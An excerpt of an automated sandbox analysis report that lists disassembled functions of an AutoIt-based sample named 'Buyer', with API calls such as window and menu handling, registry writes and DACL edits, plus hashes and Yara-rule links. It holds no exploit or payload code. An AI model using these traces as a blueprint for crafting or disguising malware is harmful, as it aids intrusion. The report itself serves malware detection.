                                                                                                    • SetErrorMode.KERNEL32(00000000,00FDDB28,?,\\.\,00FDDC1C), ref: 00FB54A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                    • Opcode ID: 202d1d6312136ca3ba5a1b584c3013b8bb0ae00658018de959fcd4f8e74b59fc
                                                                                                    • Instruction ID: 96db470b20c5ca3dca8f19eac23c2d68a0f7906a6947aa3b72b7ffac9ca572ce
                                                                                                    • Opcode Fuzzy Hash: 202d1d6312136ca3ba5a1b584c3013b8bb0ae00658018de959fcd4f8e74b59fc
                                                                                                    • Instruction Fuzzy Hash: 5D61C336600A08DFD706EB26CD51BB877B1AB00B15F28845AE486AF391C67DAD81FF51
                                                                                                    Function 00FD6BE6 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 460windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00FD6C93
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00FD6D4C
                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00FD6D68
                                                                                                    • GetMenuItemInfoW.USER32(?,00000030,00000000,?), ref: 00FD6DB9
                                                                                                    • SetMenuItemInfoW.USER32(?,00000030,00000000,00000030), ref: 00FD6E14
                                                                                                    • GetMenuItemInfoW.USER32(00000200,00000030,00000000,00000030), ref: 00FD6E37
                                                                                                    • SetMenuDefaultItem.USER32(00000200,?,00000000), ref: 00FD6E53
                                                                                                    • DrawMenuBar.USER32(?), ref: 00FD6E5F
                                                                                                    • SendMessageW.USER32(00000466,00000466,00000000,00000000), ref: 00FD6EE1
                                                                                                    • SendMessageW.USER32(000000F1,000000F1,?,00000000), ref: 00FD702F
                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00FD7053
                                                                                                    • GetFocus.USER32 ref: 00FD7059
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?), ref: 00FD7114
                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00FD7127
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00FD715E
                                                                                                    • EnableWindow.USER32(00000001,00000001), ref: 00FD717A
                                                                                                    • ShowWindow.USER32(00000010,00000000), ref: 00FD71F0
                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00FD7206
                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00FD721F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfo$Show$DefaultDrawFocusMove
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1429628313-4108050209
                                                                                                    • Opcode ID: ea38a4673a18f3c633fca318c943307d49d734e4d93be7940548cbb7953d58ce
                                                                                                    • Instruction ID: 5d5b89c9db986036829208a4ba295cfe5d9972ac452b3de024174afe9e1d9871
                                                                                                    • Opcode Fuzzy Hash: ea38a4673a18f3c633fca318c943307d49d734e4d93be7940548cbb7953d58ce
                                                                                                    • Instruction Fuzzy Hash: 12020F71508341AFD715DF24C849BABBBE6FF89324F088A1EF4948A3A1D334D945EB91
                                                                                                    Function 00FD7AB3 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000012), ref: 00FD7AEC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FD7AF0
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD7B06
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FD7B11
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00FD7B16
                                                                                                    • GetSysColor.USER32(00000011), ref: 00FD7B2E
                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FD7B3C
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FD7B4D
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FD7B56
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7B63
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FD7B82
                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FD7B99
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD7BA6
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FD7BF5
                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FD7C1F
                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00FD7C3D
                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00FD7C48
                                                                                                    • GetSysColor.USER32(00000011), ref: 00FD7C59
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FD7C61
                                                                                                    • DrawTextW.USER32(?,00FD77C0,000000FF,?,00000000), ref: 00FD7C73
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7C8A
                                                                                                    • DeleteObject.GDI32(?), ref: 00FD7C95
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7C9B
                                                                                                    • DeleteObject.GDI32(?), ref: 00FD7CA0
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FD7CA6
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00FD7CB0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 1996641542-0
                                                                                                    • Opcode ID: edf416e9f8a8e4e105dd6ca4f28f0f3dc2d47c21257b578ec7d1a18563fdc181
                                                                                                    • Instruction ID: 44d8381fa1572588987c47b5951d52e8d02217af159a491a922d5d5417f9000b
                                                                                                    • Opcode Fuzzy Hash: edf416e9f8a8e4e105dd6ca4f28f0f3dc2d47c21257b578ec7d1a18563fdc181
                                                                                                    • Instruction Fuzzy Hash: 39614F72D05218AFDB01AFA4DC49EEEBF7AEF08320F154116F915AB2A0D7759940EB90
                                                                                                    Function 00FD17AD Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00FD18E2
                                                                                                    • GetDesktopWindow.USER32 ref: 00FD18F7
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FD18FE
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD1953
                                                                                                    • DestroyWindow.USER32(?), ref: 00FD1973
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FD19A7
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD19C5
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FD19D7
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FD19EC
                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FD19FF
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00FD1A5B
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FD1A76
                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FD1A8A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FD1AA2
                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00FD1AC8
                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00FD1AE2
                                                                                                    • CopyRect.USER32(?,?), ref: 00FD1AF9
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FD1B64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                    • API String ID: 698492251-4156429822
                                                                                                    • Opcode ID: 7f284b6e1a6f808faff6351d1201a00a103e2403f9522293ef027569f4cf7f4f
                                                                                                    • Instruction ID: d201e626d7292daef245d09f1245c31362a7c5a03a343a55c0d0b3afb5a8fba9
                                                                                                    • Opcode Fuzzy Hash: 7f284b6e1a6f808faff6351d1201a00a103e2403f9522293ef027569f4cf7f4f
                                                                                                    • Instruction Fuzzy Hash: 8AB19B71A04300AFD714DF64C884B6BBBE6FF84314F04891EF9999B2A1D731E845EB92
                                                                                                    Function 00FD09FB Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FD0A9F
                                                                                                    • _wcslen.LIBCMT ref: 00FD0AD9
                                                                                                    • _wcslen.LIBCMT ref: 00FD0B43
                                                                                                    • _wcslen.LIBCMT ref: 00FD0BAB
                                                                                                    • _wcslen.LIBCMT ref: 00FD0C2F
                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FD0C7F
                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD0CBE
                                                                                                      • Part of subcall function 00F5FD18: _wcslen.LIBCMT ref: 00F5FD23
                                                                                                      • Part of subcall function 00FA2921: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FA293A
                                                                                                      • Part of subcall function 00FA2921: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FA296C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                    • API String ID: 1103490817-719923060
                                                                                                    • Opcode ID: 94b71758fefa450611a20d727aa3d2bbbbc6ad3d8958bb451e9605a344958753
                                                                                                    • Instruction ID: f13c774ff3018bfaac63807ab81de0865646950788b4096b535c8c5b25d0c892
                                                                                                    • Opcode Fuzzy Hash: 94b71758fefa450611a20d727aa3d2bbbbc6ad3d8958bb451e9605a344958753
                                                                                                    • Instruction Fuzzy Hash: 92E191326187018FC714EF24C951A2AB7E6FF84314F18895EF8969B392DB34ED45EB81
                                                                                                    Function 00F41456 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F4152D
                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00F41535
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F41560
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00F41568
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00F4158D
                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F415AA
                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F415BA
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F415ED
                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F41601
                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00F4161F
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F4163B
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F41646
                                                                                                      • Part of subcall function 00F4135A: GetCursorPos.USER32(?), ref: 00F4136E
                                                                                                      • Part of subcall function 00F4135A: ScreenToClient.USER32(00000000,?), ref: 00F4138B
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000001), ref: 00F413C2
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000002), ref: 00F413DC
                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00F59421), ref: 00F4166D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                    • API String ID: 1458621304-248962490
                                                                                                    • Opcode ID: bc5e2d593c7c2503d14a4929d5a88010e827e1e263ca89d1d87f5ecbcc434f2e
                                                                                                    • Instruction ID: cb3748b0319735bad41513e00a69d5763c04db20a9348f29aa9ffd1558910158
                                                                                                    • Opcode Fuzzy Hash: bc5e2d593c7c2503d14a4929d5a88010e827e1e263ca89d1d87f5ecbcc434f2e
                                                                                                    • Instruction Fuzzy Hash: 21B17A31A012099FDB14EFA8CD45BEE3BB5FB48324F10421AFA15A7294DB78E841EB50
                                                                                                    Function 00FA146D Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA17F6
                                                                                                      • Part of subcall function 00FA17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1802
                                                                                                      • Part of subcall function 00FA17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1811
                                                                                                      • Part of subcall function 00FA17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1818
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA182F
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FA14D7
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FA150B
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA1522
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00FA155C
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FA1578
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA158F
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FA1597
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FA159E
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FA15BF
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00FA15C6
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FA15F5
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FA1617
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FA1629
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1650
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1657
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1660
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1667
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1670
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1677
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA1683
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA168A
                                                                                                      • Part of subcall function 00FA1875: GetProcessHeap.KERNEL32(00000008,00FA1293,?,00000000,?,00FA1293,?), ref: 00FA1883
                                                                                                      • Part of subcall function 00FA1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FA1293,?), ref: 00FA188A
                                                                                                      • Part of subcall function 00FA1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FA1293,?), ref: 00FA1899
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 2f45a4ea11bfd103f6b3f3635b9563f0afa00d4aa4149f9209c6ec741a55f756
                                                                                                    • Instruction ID: 3ed29a896ec3fdbcb6d96608a9e9f0693e366d5fad16e218b939bd6c54196cc9
                                                                                                    • Opcode Fuzzy Hash: 2f45a4ea11bfd103f6b3f3635b9563f0afa00d4aa4149f9209c6ec741a55f756
                                                                                                    • Instruction Fuzzy Hash: CB7148B6D00209BFDB109FA4DC48BEEBBB9BF45360F094116F915E7291D7319A05EBA0
                                                                                                    Function 00FCCB3E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCCC44
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FDDC1C,00000000,?,00000000,?,?), ref: 00FCCCCB
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00FCCD2B
                                                                                                    • _wcslen.LIBCMT ref: 00FCCD7B
                                                                                                    • _wcslen.LIBCMT ref: 00FCCDF6
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00FCCE39
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00FCCF48
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00FCCFD4
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FCD008
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCD015
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00FCD0E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                    • API String ID: 9721498-966354055
                                                                                                    • Opcode ID: 8956017b4f886749a4de79b7a1d569557165284386d0b06ad92e64203992fd6a
                                                                                                    • Instruction ID: 19b2e9ce1542fae75b2d352f3e4c05c21c5e56703eb30b7fcbfef976ddaad1ce
                                                                                                    • Opcode Fuzzy Hash: 8956017b4f886749a4de79b7a1d569557165284386d0b06ad92e64203992fd6a
                                                                                                    • Instruction Fuzzy Hash: 9D123C356046019FD714EF14C981F2ABBE6EF88724F04849DF85A9B3A2CB35ED42DB91
                                                                                                    Function 00FD10D8 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FD1180
                                                                                                    • _wcslen.LIBCMT ref: 00FD11BB
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FD120E
                                                                                                    • _wcslen.LIBCMT ref: 00FD1244
                                                                                                    • _wcslen.LIBCMT ref: 00FD12C0
                                                                                                    • _wcslen.LIBCMT ref: 00FD133B
                                                                                                      • Part of subcall function 00F5FD18: _wcslen.LIBCMT ref: 00F5FD23
                                                                                                      • Part of subcall function 00FA32CA: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA32DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                    • Opcode ID: a5e79e6abc23efdcb61ab17cfb6cfbdbe74e1d449a16e09d04d16b808905f327
                                                                                                    • Instruction ID: e2254cf631661660840fd9ffe3e7813cfadba47330ed17db1a72150e6e794e5e
                                                                                                    • Opcode Fuzzy Hash: a5e79e6abc23efdcb61ab17cfb6cfbdbe74e1d449a16e09d04d16b808905f327
                                                                                                    • Instruction Fuzzy Hash: 49E1C2726087019FC714EF24C84092AB7F2BF95314F18895EF8969B7A2D734ED46EB81
                                                                                                    Function 00FCD11F Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 240COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
